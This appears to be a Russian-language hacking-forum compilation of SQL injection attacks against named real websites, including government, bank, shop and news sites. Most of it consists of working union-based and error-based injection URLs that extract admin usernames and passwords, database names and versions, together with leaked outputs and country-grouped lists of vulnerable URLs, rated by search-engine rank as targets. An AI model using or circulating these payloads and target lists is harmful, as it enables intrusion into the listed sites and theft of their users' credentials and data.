SQL Инъекции

Читалка столбцы

 

Пройдемся по error-based, в таком случае.

PHP:

http://aw-o.com/item.php?pid=15&lang=rus+and(select+1+from(select+count(*),concat((select+(select+(select+distinct+schema_name+from+`information_schema`.schemata+limit+1,1))+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1--

Вывод:

PHP:

Duplicate entry 'awocom1' for key 1)

 

PHP:

http://kif-auto.ru/modules/view_a.php?id=-3'+and+1=0+union+select+1,version(),3,4,5,6,7,8+--+

 

PHP:

http://www.jcmi.ca/events/event.php?id=-1+union+select+1,2,3,4,5,6,7,g roup_concat%28username,0x3a,pa  ssword%29,9,10,11,12,13,14,15, 16,17,18+from+jcUsers--

http://www.ciaproperties.co.za/prop001.php?id=-225+union+select+1,2,3,g  roup_concat%28txtuser,txtp assworde%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,  24,25,26,27+from+tbluser--

communicat.pk

пароли в открытом виде

PHP:

http://www.communicat.pk/web/market_map.php?id=-4+union+select+1,g  roup_concat%28table_name%29,3,4,5,6,7,8+from+information_schema.tables+w  here+t  able_schema=CHAR%2867,%2079,%2077,%2077,%2085,%2078,%2073,%2049,%2095,%2067,%2065,%2084%29--

ousa.ca

PHP:

http://ousa.ca/educatedvoice/page.php?id=57+AND+1=2+U NION+S ELECT+1,2,0x494e432e,4--

mysql:Gov

Code:

http://www.bogota.gov.co/equidad/newequi.php?id=%27
http://www.tsgaj.gov.cn/pluger/pingjia/index.php?act=frame&type=jws&id=6%27
http://xz.luanxian.tsgaj.gov.cn/show.php?id=5574%27
http://www.nbyzrc.gov.cn/homepage2/subview.php?id=1818
http://www.yatsen.gov.tw/chinese/lesson/show.php?id=4&PHPSESSID=
http://tccip.hach.gov.tw/tccp/main?page=temp_01_detail&id=26%27
http://sun.yatsen.gov.tw/hero_detail.php?id=%27

mysql:UK

Code:

http://www.bepropertyservices.co.uk/sales_fulldetails.php?id=2004583
http://www.b-r.co.uk/sales_fulldetails?id=300216567
http://cankay.org.uk/popup.php?class=stretches&act=displayStretchInfo&id=63
http://www.idbaza.co.uk/details.php?pid=48&lan=en
http://www.citrixchanneltraining.co.uk/ev.php?pg=ev&id=%27,ID,%27&sid=
http://www.atkinsonkeene.co.uk/sales_fulldetails.php?id=1578035
http://www.id-eclectic.co.uk/bluadmin/get_cart_info.php
http://www.kapitol.co.uk/index.php?id=11CachedYou
http://www.enidblytonsociety.co.uk/book-details.php?id=637andtitle=Tales+After+Supper
http://apollolettings.co.uk/propertydtl.php?id=%2749%27
http://www.managingdiversity.co.uk/news_archive_list_articles.php?ID='
http://www.ctgltd.co.uk/news.php?id=70&title=CTG+TORQLine+equipped+Impreza+fastest+in+the+world
http://www.shadow-world.co.uk/modules/profile_1.2/index.php?doing=viewProfile

mysql:MX

Code:

www.euromaquinas.com.mx/detallesescoplos.php?cod='
http://www.anemonaqro.com.mx/fabricantes.php
www.imagendeveracruz.com.mx/vercolumna.php?id='
http://www.mexmicro.com.mx/catalogo.php?id=135
http://mexicolegal.com.mx/oficina/index.php?id=3905
http://www.novenet.com.mx/seccion.php?id=209994&sec=&d=07&m=06&y=2011
http://www.impuestum.com.mx/noticias/5.html?PHPSESSID=%27
http://www.ccs.net.mx/contenido.php?id=2763
http://redu.org.mx/vernoticia.php?noticiaid=111
http://estudio5.com.mx/fabricantes.php

PHP:

http://www.cdneza.gob.mx/index.php?id=galerias&cve=51+A ND+1=0+U NION+S ELECT+0

mysql:FM

Code:

http://www.aukcje.fm/show_user.php?id=8163&type=give
http://www.blu.fm/subsites/partypix/index.php?s=partypix&a=ecard&i=1&id=712
http://edura.fm/#!/radiogruppe/beitraege.php?gr_id=54&g_id=&g_player=off&g_lang=de&id=54&select=neuste&u_id=&au_id=0&d_id=

mysql:EU

Code:

http://www.gluchowski.eu/pl/index.php?url=galeria&akcja=inne&opcja=pokazgal&id=4&gal=2&tytul=Zdj%C4%99cia%20z%202005
https://ekash.eu/index.php/agentsworldwide
http://gyg4u.eu/index.php?id=92
http://www.sweethanol.eu/art.php?id=14
http://www.paukova-mreza.eu/index.php?task=view&id=276
http://www.sociologiapadova.eu/?pagina=pagina_generica.php&id=2..
http://www.wawerek.eu/articles.php?id=00
http://www.paukova-mreza.eu/index.php?task=view&id=276
http://www.sgelectronics.eu/contact.php
http://humanconcept.eu/ajanlatok_bovebb.php?id=29
http://www.badalini.eu/home_it.php?azione=scheda_prodotto_it&id=51
http://www.impolex.eu/index.php?PHPSESSID=&akcja=01&id=3

CO.IL

PHP:


www.ift.co.il/showPage.asp?id=26+union+select+1,username,3,4+from+admins
http://www.ift.co.il/showPage.asp?id=26+union+select+1,password,3,4+from+admins
http://www.ohv.co.il/asp/portfolio_company.asp?id=117%20union%20select%201,2,u name,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22%20from%20a dmin
http://www.raz-pi.co.il/pages.php?id=-9+union+select+0,us ername,pa ssword+from+admins
http://www.isratim.co.il/archive/2008/details.php?id=-155+UNION+SELECT+1,group_concat%28login,0x3a,pa  ssword,0x3a,a  dmin%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,  24,25,26,27,28,29+from+userkeys
http://dandd.co.il/video.asp?id=3+union+select+1,u sername,pa  ssword,4, 5,6,7+from+admin
http://www.yadal.co.il/Contents/details.asp?id=662+union+select+1,2,3,4,5,u  sername,7,8,9,10,pa  ssword,12,13,14, 15,16,17+from+admins  

SQL Injection:Co-operative Urban Bank

Code:

http://www.ferokebank.in/news.php?id=1
Tables found: [B]fcub_logs,fcub_newsboard3,fcub_user,fcub_user_logs[/B]

 

Вопросы-ответы по ремонту и строительству.

ТИЦ == 30, PR ==3;

PHP:

http://www.remotvet.ru/index.php?catID=-205+union+select+count(*)+from+users--

 

onlymelbourne

 

Новостной портал.

ТИЦ == 230, PR == 4, DMOZ == true;

PHP:

http://tvkrasnodar.ru/news/?id=7777777'+union+select+1,2,3,4,5,6,7,8,9,10+--+h

 

kobaltt

 

PR == 3

PHP:

http://www.mir-sekretov.ru/detailNews.php?newsID=-4+union+select+1,2,@@datadir,@@tmpdir,5,6,7,8--

PR == 1 и мерзкие рожи

PHP:

http://www.vivadisco.ru/en/index.php?newsid=-17+union+select+1,2,3,4,concat_ws(0x03a,user(),database(),version()),6,7--

ТИЦ ==10 PR ==3 и error-based

PHP:

http://www.exp-edition.ru/reviewarticle.php?newsid=1392+and(select+1+from(select+count(*),concat((select+(select+database())+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1

Шоп. PR == 2

PHP:

http://www.vladbaby.ru/?catid=-4+union+select+1,2,3,4,5,database(),7,8--

Вывод в соурс vladbaby_webshop

 

http://www.interfax-religion.ru/?act=news&div=-41496%20and%201=2%20union%20select%20concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15+--

4.1.25-log religion_main@localhost db_religion_main portbld-freebsd7.1

 

deb3422_refunc@localhost

 

На сон грядущий.

тИЦ (CY) == 30, PR == 2, DMOZ.org == true;

PHP:

http://www.kiteboard.ru/index.php?pid=75&id=-114'+union+select+1,2,3,4,5,6--+h

 

evwind

lorpen

 

Code:

http://www.yasminchagas.com.br/hotsites/index.php?id=-37+union+select+1,2,0x6861636b6564206279207375727072697a,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),version(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+--+

[email protected]:4.1.22-community-nt-log:yasmin

 

sanjulian

 

Шоп, ТИЦ == 20, PR == 2;

PHP:

http://www.vidatec.ru/show.php?id=82+union+select+1,2,count(*),4,5,6,7,8,9+from+vnew_users--

 

Тиц=850, pr=5, траф>9к
error based

PHP:

http://vitawater.ru/shop/product_info.php?products_id=14348'+and+(select+products_name+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--'

 

PR = 4

 

uscar

 

Бедный сайт, его уже 4 года подряд хакают